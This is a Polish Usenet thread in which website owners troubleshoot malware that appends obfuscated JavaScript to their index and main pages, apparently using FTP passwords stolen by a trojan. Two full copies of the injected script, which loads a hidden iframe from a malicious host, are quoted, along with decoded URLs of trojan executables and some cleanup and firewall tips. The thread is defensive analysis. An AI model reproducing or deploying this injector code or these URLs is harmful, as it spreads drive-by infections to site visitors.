[ mallware doklejajacy zdalnie kod do stron ]
Matt Rutkowski
czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
dokleja zdalnie nastepujacy kod javascript do stron o nazwie
index.php, index.html, main.html, main.php
-- kod --
<!-- ad --><script language="JavaScript">function rkfg(jflq){return
String.fromCharCode(jflq);}var
ohhe="060105102114097109101032115114099061039104116116112058047047115117112101114105111114097100122046105110102111047111112105115047063116061049051039032119105100116104061039048039032104101105103104116061039048039032115116121108101061039118105115105098105108105116121058032104105100100101110059039062060047105102114097109101062";var
ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr
(qhxk, 3));}window.status='Done';document.write(ifdm);</script>
<!-- /ad -->
-- kod --
w/w kod tworzy ukryta iframe i laczy sie z adresem http://superioradz.info/opis/?t=13
--
Matt Rutkowski
Matt Rutkowski
Piotr Gackiewicz
> Witam,
>
> czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
> dokleja zdalnie nastepujacy kod javascript do stron o nazwie
> index.php, index.html, main.html, main.php
Nie wiem, czy z tym konkretnym syfem, ale z podobnymi miałem do czynienia
kilkakrotnie. Zawsze doklejało się przez FTPa, inicjowanego zwykle z IP
spoza Polski.
Podejrzewam, że loginy i hasła wykradane są z rejestru Windows przez inny
malware, podmiana plików była zawsze z innych IP niż zwykle używane do tych
konkretnych kont FTP.
--
Piotr Gackiewicz
elmer radi radisson
> czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
> dokleja zdalnie nastepujacy kod javascript do stron o nazwie
> index.php, index.html, main.html, main.php
A dokleja dokladnie do plikow tresci statycznej strony, czy moze
raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.
A w ogole to pl.comp.security ?
--
tajemnicze kręgle w zbożu
Matt Rutkowski
> raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.
- trojan ktory wykrada hasla z popularnych klientow ftp i kolejno
laczy sie ze strona doklejajac do plikow o nazwie index.php,
index.html, main.php, main.html statycznie generowany content (kod w
mailu wyzej)
- dal sie zauwazyc z racji, ze wielu klientow uzywa szablonow html
smarty; doklejenie kodu js w niewlasciwym miejscu powoduje uwalenie
strony
--
Matt Rutkowski
Spamcop
news:slrngp03qk...@gacek.intertele.pl...
Dlatego wlasnie nalezy uid serwera ustawiac inny jak uid ftp, i ustawic
wlasciwe prawa.
--
s.
bo...@nano.pl
Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie nagra.
Ja ostatnio trafiłem na podobny syf, ale zamiast doklejać się wgrywa
.htaccess z rewrite na stronkę z jakimś syfem.
wer
Spamcop
>> wlasciwe prawa.
>>
>
> Co tym chcesz osiągnąć? I tak musisz dać prawa do odczytu do plików
> wrzuconych przez usera dla serwera www. Bo inaczej żadnej strony nie
> nagra.
skoro www NIE bedzie mialo prawa do zapisu to jak ci ktos zrobi injecta?
--
s.
Jacek Osiecki
Gdzieś będzie musiało mieć, chyba że zrezygnujesz ze smarty ;)
A na dziadostwa doklejające kod przez FTP i tak nic to nie da...
Pozdrawiam,
--
Jacek Osiecki jos...@ceti.pl GG:3828944
I don't want something I need. I want something I want.
apoca...@gmail.com
Mam identyczny problem - wczoraj to coś podoklejało mi właśnie taki
kod, jaki podany został w pierwszym mailu.
Dodam, że kod ten zostaje doklejany zaraz za znacznikiem <body>,
jeżeli taki istnieje - w przeciwnym wypadku wrzuca go na końcu
dokumentu.
Mi dokleiło to ten kod do plików nazwanych index.html, index.php,
main.html i home.html (więc zapewne do home.php też by dokleiło).
Wczoraj to coś zaatakowało około południa, po tym jak wyrzuciłem ten
kod - za jakąś godzine znowu się pojawił. Znowu usunąłem - za pół
godziny znowu... Usunąłem - za kilka minut znowu, i w końcu
zainstalowałem taki prototypowy wyłapywacz zawartości tablicy $_SERVER
wszystkich, którzy wchodzą na stronę, i wtedy ataki ustały. Ale
dzisiaj o 11:32 (taką mam datę ostatniej modyfikacji przy
zaatakowanych plikach). Ten wyłapywacz $_SEVER'a jednak nic nie
wykrył, czyli to coś musi chyba przez FTP edytować te pliki. Szukałem
w logach apacha, ale nic niezwykłego tam nie znalazłem.
Dodam że używam PHPTAL'a (system szablonów).
Jeżeli będziecie wiedzieli coś więcej na ten temat, piszcie. Razem to
coś pokonamy ;-)
crazy bejbi
są klasyczne połączenia ftp
najpierw pobranie pliku np. index.php a potem wgranie go znowu.
czyli jak ci sie dokleja, to znaczy, że masz syfa na kompie, który
wykrada loginy i hasła do ftp (np. z totalcommandera)
najprościej zmienić hasło do ftp
Wojtek
apoca...@gmail.com
> apocalyp...@gmail.com pisze:
Hm, no jakby ktoś zdobył dostęp do ftp, to by się chyba nie bawił w
jakieś tam doklejanie kodu? :-) Ale faktycznie wszystkie hasła mam
zapisane na kompie - używam linuksa, i tu normalnie edytor tekstu
łączy mi się z serwerem, jeżeli chcę przeedytować jakiś plik :-) Ale w
jakiś sposób to coś mogłoby wykraść hasła? Musiałoby się chyba z moim
kompem połączyć?
crazy bejbi
> Hm, no jakby ktoś zdobył dostęp do ftp, to by się chyba nie bawił w
> jakieś tam doklejanie kodu? :-) Ale faktycznie wszystkie hasła mam
> zapisane na kompie - używam linuksa, i tu normalnie edytor tekstu
> łączy mi się z serwerem, jeżeli chcę przeedytować jakiś plik :-) Ale w
> jakiś sposób to coś mogłoby wykraść hasła? Musiałoby się chyba z moim
> kompem połączyć?
to nie robi człowiek, tylko bot. niemniej poszukaj w logach serwera ftp.
ja 100% masz połączenia, ze user sie zalogował, potem pobrał plik
index.php i od razu go wgrał znowu. po czym się rozłączył :)
Wojtek
apoca...@gmail.com
> apocalyp...@gmail.com pisze:
Wczoraj, po ataku, zapisałem dokładną godzinę tegoż ataku (data
ostatniej modyfikacji zaatakowanych plików). Dzisiaj zajrzałem we
wczorajsze logi, i około tej godziny nikt nie wchodził na stronę.
Czyli to coś musi się przez FTP łączyć? Można gdzieś sprawdzić
historię logowań na FTP? W DirectAdminie mam tylko historię logowań na
DirectAdmina i logi. Są gdzieś w ogóle zapisywane IPy kompów (i
godziny) łączących się z FTP?
crazy bejbi
> historię logowań na FTP? W DirectAdminie mam tylko historię logowań na
> DirectAdmina i logi. Są gdzieś w ogóle zapisywane IPy kompów (i
> godziny) łączących się z FTP?
no taaaaak, DirectAdmin ...
logujesz się przez ssh na roota albo na usera i przechodzisz na roota
przez komendę sudo -s
i oglądasz plik /var/log/syslog albo /var/log/pure-ftpd/transfer.log
albo /var/log/xferlog
zależnie od dystrybucji i serwera ftp mogą być inne ...
Wojtek
Matt Rutkowski
problemowi moze byc:
1) jesli ktos ma niewieli ruch do serwera (rzedu kilku Mb/s) i uzywa
linux'a z kernelem z rodziny 2.6 mozna zastanowic sie nad taka regolka
w iptables:
iptables -A INPUT -p tcp -m string --string "rkfg(jflq)" --algo bm -j
DROP
choc z doswiadczenia powiem, ze inspekcja pakietow w > 3 warstwie ISO/
OSI ma drastyczny wplyw na wydajnosc systemu
jesli ktos ma czas i ochote polecam poprobowac z wyborem wlasciwego
(lepszego?) algorytmu (opcja: --algo bm)
2) drugie rozwiazanie, nie zawsze do wprowadzenia - ograniczyc dostep
do ftp tylko dla klientow z wybranych sieci (np. 83.0.0.0/11,
79.184.0.0/13 czy pula przewidziana dla firmy). Wirus laczy sie z
zagranicznych systemow.
--
Matt Rutkowski
Krzysztof Oledzki
> Generalnie ujmujac sprawe to lekarstwem 'na szybko' przeciwko
> problemowi moze byc:
>
> 1) jesli ktos ma niewieli ruch do serwera (rzedu kilku Mb/s) i uzywa
> linux'a z kernelem z rodziny 2.6 mozna zastanowic sie nad taka regolka
> w iptables:
>
> iptables -A INPUT -p tcp -m string --string "rkfg(jflq)" --algo bm -j
> DROP
To jest zły, a nawet bardzo zły pomysł. Taki ciąg może trafić
się we wszystkim, zaczynając od sesji ssh, a kończąc na sesji
nntp do serwera news i próbie pobrania tego posta. ;)
Pozdrawiam,
Krzysztof Oledzki
--
Krzysztof Olędzki
e-mail address: ole(a-t)ans(d-o-t)pl
Registered User: Linux - 189200, BSD - 51140
Nick Handles: KO60-RIPE, KO581 (Network Solutions)
crazy bejbi
> To jest zły, a nawet bardzo zły pomysł. Taki ciąg może trafić
> się we wszystkim, zaczynając od sesji ssh, a kończąc na sesji
> nntp do serwera news i próbie pobrania tego posta. ;)
poza tym blokujesz tylko wyjście wirusa na zewnątrz. A problem jest,
żeby go nie dopuścić ...
na pewno można poszukać wpisów wirusa na całym serwerze:
wejść do katalogu se stronami (np. /home) i komenda:
grep -r -l ohhe *
oczywiście ciąg może się znaleźć w wielu plikach, to bierzemy pod uwagę
tylko .html, .htm, .php
Wszystkie konta, na których są zmienione pliki najlepiej zacząć od
zmiany hasła do ftp i czyścić pliki ...
Wojtek
bboy...@gmail.com
Jk usuniesz ten kod z plików i zmienisz hasło do FTP, to już więcej to
gówno się nie doklei. Ale jak tylko znowu sie połączysz z FTP
(używajac nowego hasła), wirus znowu przechwyci twoje hasło i zabawa
zaczyna się od początku.
Czy komuś udało się usunąć tego wirusa z komputera? Norton Internet
Security nic mi nie wykrywa =(
Michal Podsiadly
> Czy komuś udało się usunąć tego wirusa z komputera?
Moze wystarczy odinstalowac pirackiego Total Commandera z "niespodzianka" w
srodku? ;)
pzdr.
bboy...@gmail.com
Co masz na mysli?
apoca...@gmail.com
Doszedłem do tego, że to coś jakoś wykrada hasła. Po zmienieniu hasła
i nie zapisaniu go u siebie w menegerze haseł, atak został
przeprowadzony na inne strony (do których hasło mam zapisane na
kompie), a na tą, gdzie zmieniłem hasło - nie. Siedzę na linuksie, a
na linuksa wirusów podobno nie ma... Te hasła zapisane też ma kumpel,
który siedzi na winxp, jak robił skan kompa, wykryło mu niby jakieś
trojany, może to u niego wykradało te hasła.
bboy...@gmail.com
Rzeczywiście problem był z Total Commanderem, używałem starej wersji,
zainstalowałem najnowszą i na razie jest ok
Dzięki
Daniel
> Doszedłem do tego, że to coś jakoś wykrada hasła. Po zmienieniu hasła
> i nie zapisaniu go u siebie w menegerze haseł, atak został
> przeprowadzony na inne strony (do których hasło mam zapisane na
> kompie), a na tą, gdzie zmieniłem hasło - nie. Siedzę na linuksie, a
> na linuksa wirusów podobno nie ma... Te hasła zapisane też ma kumpel,
> który siedzi na winxp, jak robił skan kompa, wykryło mu niby jakieś
> trojany, może to u niego wykradało te hasła.
Na Linuksa wirusy są, ale trochę inne. Hasła wykradał jakiś trojan z
windowsów, nie tylko z totalcmd. KAV wykrył go dopiero po jakimś czasie
(niestety po wykradzeniu haseł).
Pozdrawiam
Daniel
Matt Rutkowski
---[ kod ] --
<!-- ad --><script>osoem=(4e0,190);
johbc=(9e0,1909);
arnrb=(65.,""+"a"+"m"+"e");
vpkgs=(0x826," ");
oymzl=(1.89e2<=656?"":5.);
oozuk=(0x44>6?"17":2.934e3);
aivuk=(4e0,""+".");
rjreh=(5.4e1>0.3?"":.5);
mnswd=(414>6.17e3?70.:"9");
zlits=(5.5e1>1.5e1?".":46.);
wlpwa=(9,"93");
dmdcw=(1e1<.6495?278.:"las");
bthvu=(0.900,"r");
xwjcg=(0x4,"yl");
wxvoe=(0.64<=0.1?.9:""+"i"+"s"+"");
wafzv=(646>8.39e2?9518:"i");
jfazq=(0x685>=8e1?""+"b"+"i"+"l"+"":4.3e1);
ernzk=(.840>=2.?53.:"i"+"t"+"y"+"");
yfnul=(8.51e2,":");
skxws=(.448,"");
vyrje=(0x6,"<");
kylrc=(59,"/i");
zllcn=(8483,""+"a"+"");
oxynx=(9.6e1,""+"m"+"e"+"");
elbis=(0x66<2002?"r":0x547);
slnat=(7.07e2,"");
onlvz=(9e0<0x54?"='":58);
bljji=(6.,"ht");
oowax=(9.3e1<=4?835.:"tp");
vafut=(93>634.?6157.:":/");
hswsd=(.3>=6.?33.:"");
bwtwu=(0.9,"o");
efesv=(0.8,"/");
nczim=(8166>=3.495e3?"=":0.7);
kkkka=(0x93,"2");
btqpy=(.6," ");
yxjvl=(9.,""+"");
myfsk=(7,"");
qcevo=(0x2<.350?.4:"h");
lmiph=(.1055>=0.92?0.8:"i");
fgjfd=(329,"d");
onjpi=(9.84e2<=854.?0.7687:"e");
ypdfc=(0.65<=42.?" "+"":.8318);
claug=(0x3590,">");
lpcpn=(7.7e1,"");
nhbvb=(2,""+">");
flrft=(0x9,5);
irhwk=((93<=9893?.711:3)<=(0.9>=9.4e1?.569:3.692e3)?(.3<=1.2e1?osoem:
2.21e2):(4.>.3?.6:0.31));
fyatw=((973.,0.5e1)<(3928.,.7689)?(5<=.532?.696:2e0):(5e0,johbc));
nwyro=((7e0>=8.?3869.:0x2),(5.91e2>=0.957e3?0x2110:arnrb)+(0.5e1,vpkgs)
+(.830>=9.8e1?.533:oymzl));
xwuua=((7e0>=82.?.9357:7.),(1983.>=20.?"85"+"."+"":8352)+(6.35e2<0x2?
0x83:oozuk)+(1.2e1>0x4843?56:aivuk));
kzxos=((.3727,5.06e2),(.727,rjreh)+(91,"1"+"3")+(6849.,mnswd)
+(15.,zlits)+(4>.336?""+"1"+"":.2)+(0.68,wlpwa)+(.79,"/")+(.136,dmdcw)
+(0x4<.5?.4:"the")+(6,bthvu)+(2.,""));
kxotj=((3.08e2,0.7310),(0x2,xwjcg)+(7e0<=7.269e3?"e=":
5.106e3)+(2.,""+"'"+"v"+"")+(0x4<6e0?wxvoe:0x7616)+(.9511<=0x5251?
wafzv:0.1902)+(2.807e3>2.1e1?jfazq:0x2)+(5588.>=2.?ernzk:
8.11e2)+(781>=0.2435?yfnul:67)+(.82,skxws));
xynhe=((.58,1.266e3),(33>0x32?0x4312:vyrje)+(.6084<=957?kylrc:
0x2769)+(0.63,"fr")+(2e0,zllcn)+(6.,oxynx)+(426,""));
aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3:6.427e3)?(0x1985,9389):
(6e0,.825)),((0.229e3>=69.?4.562e3:3132)<=(66<=0x3?7e0:0x229)?
(5217.,5e0):(376.>7.86e2?6.5e1:document)))[(((.82,0x6)<=(8130,.7246)?
(4.7e1<.551?2:0.991):(0x9688>=781.?0.31:5.04e2)),((7.1e1>=.1?.
29:3.8e2),(382,"w")+(9865>=.2?elbis:13)+(.152>=0x452?0.363:""+"it"+"")
+(5.<=8.1e1?"e":0x35)))]((((.6209,6193.),(1.2e1>=9?irhwk:2.89e2))<((.
70,.768)>(5.>=.8447?0x27:681.)?(9870,96.):(454,fyatw))?((0x5<7852?.
16:0.4)<=(1e0>1.173e3?0x9967:.3)?(0.3,"<ifr"):(.812<27.?58:1e0))+
((53.<=29.?1194.:0x9563),(0x961,nwyro))+((1631>88?0x578:7e1)>=(79>=.44?
0x107:6.07e2)?(.6,slnat)+(5.94e2,""+"s"+"")+(7.21e3>5e0?""+"r"+"c"+"":
0.509e3)+(84.<=185.?onlvz:193)+(.202,bljji)+(5.6e2<3365.?oowax:
1.8e1)+(338.<738.?vafut:0.5e1)+(0.1e1>=.21?"/":9e0)+(4.5e3>=1?hswsd:.
573):(.3<.272?60.:0.1))+((0x6,7.5e1),(986.<=36.?6.3e1:xwuua))+
((256>=57.?.89:8e0),(13.>0x7643?216.:kzxos))+((0.183>1?.20:.5705)<=
(27>=3e0?.909:39)?(6506.,"")+(.794>=0.2?bwtwu:0x66)+(.39,"1")
+(3.03e3,efesv)+(7.2e1>=0x79?0.202:"?")+(0x83,"t")+(0.3e1,nczim)
+(1538.<=228.?0.9e1:kkkka)+(0.768>374.?348.:"'")+(1606.,btqpy)
+(7.212e3,"s")+(0x8619,"t")+(3.>0x2864?8957:yxjvl):(.756>1221.?
932:6.672e3))+((653.,8.07e2)>=(.95<2.4e1?4e0:554)?(0x6291,kxotj):
(4.9e1,9.))+((263<6.423e3?53.:8.24e2),(4>=0.13?myfsk:.6)+(238<0.6?
0x37:qcevo)+(.984>=0x2261?2.052e3:lmiph)+(.94,"d")+(7.845e3>=5?fgjfd:.
294)+(4e0,onjpi)+(4872.,"n")+(0.3754>.4?533:"'"+"")+(0.794e3>9487.?
4.8e1:ypdfc)+(5374.,claug)+(5.9e1,lpcpn))+((0.90,408.),(0x2<=5.041e3?
xynhe:0x3))+((2.<1.328e3?377.:8e0)<(2.58e2,1e0)?(0x826<.4?0x436:.1):
(4.2e1<8?0.88e2:nhbvb)):((5901>=.8159?flrft:9e0),(.4,8.933e3))));
</script><!-- /ad -->
---[ kod ] --
adres ktory wywoluje:
http://85.17.139.193/lasthero1/?t=2
--
Matt Rutkowski
apoca...@gmail.com
U kolegi hasła do serwera, na którym nastąpiły te ataki, też było
zapisane :-) Po tym jak zeskanował kompa antywirem, wykryło mu
kilkadziesiąt wirusów, w tym trojany. Po ich usunięciu i zmianie hasła
na serwer, ataki ustały :-)
bo...@nano.pl
> zapisane :-) Po tym jak zeskanował kompa antywirem, wykryło mu
> kilkadziesiąt wirusów, w tym trojany. Po ich usunięciu i zmianie hasła
> na serwer, ataki ustały :-)
Ja ciągle mam próby logowań z 216.240.153.33 i 216.240.150.242, ale nie
doklejają java script, ale dodają własny .htaccess kierujący na jakaś
witrynę z syfami.
wer
mateusz.l...@gmail.com
antyvirami mam zabezpieczenia, spybotem tez był skan wszystko
skasowane. No i nadal to samo? Pomocy... bo zaczyna być to już nie
przyjemne.
Matt Rutkowski
przybywa....
grzebalem w kodzie js tego czegos i finalnie malware laczy sie z
nastepujacymi url'ami:
http://85.17.189.183/opis/?h=2e - punkt przerzutowy
---[ wlasciwe trojany] --
http://banksguard.com/picxxx/gate.php?id=7534504a
http://banksguard.com/pics/ncr.exe
http://banksguard.com/picxxx/file.php?del
http://banksguard.com/picxxx/file.php?del
http://banksguard.com/pics/ncr.exe
http://www.trart.net/vildanezik.net/album/default.exe
--
Matt Rutkowski
Mariusz 'Lesio' Leśnikowski
Zobacz
http://www.bleepingcomputer.com/combofix/pl/instrukcja-uzycia-combofix
--
.: Lesio :.
www.lesio.net
GG:1163804
pozegnani...@gmail.com
Dokleiło mi to samo, zarówno wcześniejszą ramkę, jak i ten syf.
Skutki po wizycie są (chyba) opłakane. Spybot-SD zaczął wariować, a po
restarcie komputer zgłasza brak plików i XP nie wystartuje.
Hasło do FTP zmienione. Home.pl nie poczuwa się, oni nie są od
pilnowania zawartości stron użytkowników.
bo...@nano.pl
A co mają robić? Lecieć do Ciebie z antywirusem? Skąd mają wiedzieć, że
to wrzuca bot, a nie Ty?
wer
pozegnani...@gmail.com
> pozegnanie.z.afr...@gmail.com napisał(a):
Tak i nie.
Nie mam do nich pretensji. Stwierdziłem fakt, bez rozpatrywania w
kategoriach pozytywnie/negatywnie.
Ok. Oni tylko dostarczają miejsce i mają w nosie co kto trzyma.
Ale. Z drugiej strony, gdyby firmy hostingowe interesowały się tym co
mają na dyskach (oczywiście za wiedzą i zgodą użytkowników) ilość
wirusów i szybkość ich namnażania mogła by zmaleć.Oczywiście to
oznaczałoby dodatkowe nakłady, koszta i być może podwyżkę. Ten kod
wirusa pojawił się już jakiś czas temu (znalazłem posty z 2004 z
takimi zapytaniami), więc gdyby hoster sprawdzał ruch na FTP mógłby
uchronić klienta przed nieprzyjemnościami. Gdyby była taka opcja w
cenniku pewnie chętnie bym z niej skorzystał. Podejrzany kod -
kwarantanna - informacja i pytanie do kontaktu technicznego.
Ale to oczywiście tylko gdybanie. Ja stwierdzam suchy fakt - firmę
(potężną) hostującą nie interesuje fakt zawirusowania strony. I tyle.
Nie ulega wątpliwości (chyba), że winnym jest jedna z osób
posiadających hasło do FTP i nie zamierzam się o to spierać, i nie
oskarżam Home o zaniedbanie.
bo...@nano.pl
A jak wyobrażasz sobie sprawdzanie ruchu na ftp? Trzeba by było to dać
na serwer www, po wgraniu pliku odpalany antywirus, nie da się gdzie
indziej tego zrobić, bo zwykle też jest sftp. Mogę wymyśleć dziesiątki
scenariuszy, którymi można ominąć takie sprawdzanie. Wiem jak wygląda
problem z tym, bo teraz jest nalot tego i non stop informuje userów o
tym, że ktoś przechwycił ich hasła. Z tym, że część osób ma to gdzieś. I
co wtedy?
>
> Ale to oczywiście tylko gdybanie. Ja stwierdzam suchy fakt - firmę
> (potężną) hostującą nie interesuje fakt zawirusowania strony. I tyle.
> Nie ulega wątpliwości (chyba), że winnym jest jedna z osób
> posiadających hasło do FTP i nie zamierzam się o to spierać, i nie
> oskarżam Home o zaniedbanie.
Jeśli jakaś firma zaczyna sprawdzać i kontrolować ruch to zaraz jest
oskarżana o inwiligacje.
wer
Patryk Włos
> (potężną) hostującą nie interesuje fakt zawirusowania strony. I tyle.
> Nie ulega wątpliwości (chyba), że winnym jest jedna z osób
> posiadających hasło do FTP i nie zamierzam się o to spierać, i nie
> oskarżam Home o zaniedbanie.
Wg mojej wiedzy home.pl skanuje zarówno hostowane strony, jak i pocztę.
Tyle, że:
a) skanuje nie podczas transmisji, a regularnie całe dyski z leżącym już
contentem
b) skanowanie jest zoptymalizowane pod kątem szybkości (tj. może być
problem z wykryciem czegokolwiek wewnątrz dużego archiwum)
c) nie jest powiedziane, że program antywirusowy musi znaleźć od razu
każdego wirusa - są wirusy metamorficzne, które są wykrywane po
symptomach na zawirusowanym kompie, a z którymi skaner samych plików
jako takich sobie nie poradzi
--
Zobacz, jak się pracuje w Google:
http://pracownik.blogspot.com
Matt Rutkowski
postepowania w takich przypadkach.
Moje doswiadczenia z home.pl sa dosc pozytywne. Potrafia sprawnie
reagowac na zgloszenia w przeciwienstwie do swoich amerykanskich
odpowiednikow gdzie mozna dzwonic i przy odrobinie szczescia ktos
zajmie sie tematem.
Wada rozwiazan home jest fakt, ze dostep do ftp'a nie moze byc np.
ograniczony per ip.
Dzis w serwisach klientow znalazlem juz trzecia odmiane dziwacznego
wirusa. Nic, na razie pozostaje czekac na rozwoj sytuacji.
Dziwi mnie natomiast fakt, ze malware rozprzestrzenil sie juz do
tpnet'u a &tp ktora tak zaciekle walczy z haxorami, botnetami i
wszelakim zlem nawet nie mysli o zablokowaniu ruchu do paru podsieci
ktore sieja spustoszenie i sa ostatnimi czasy w centrum uwagi
zwlaszcza internautow z europy srodkowo-wschodniej.
--
Matt Rutkowski
pozegnani...@gmail.com
stronkę
ibanki24.pl
Czy kod który jest tam na końcu w znacznikach <ad> nie jest
przypadkiem kolejną odmianą tego samego ustrojstwa? Czy to tylko
"banner reklamowy"?
Czy nie ma już w ogóle witryn bezpiecznych?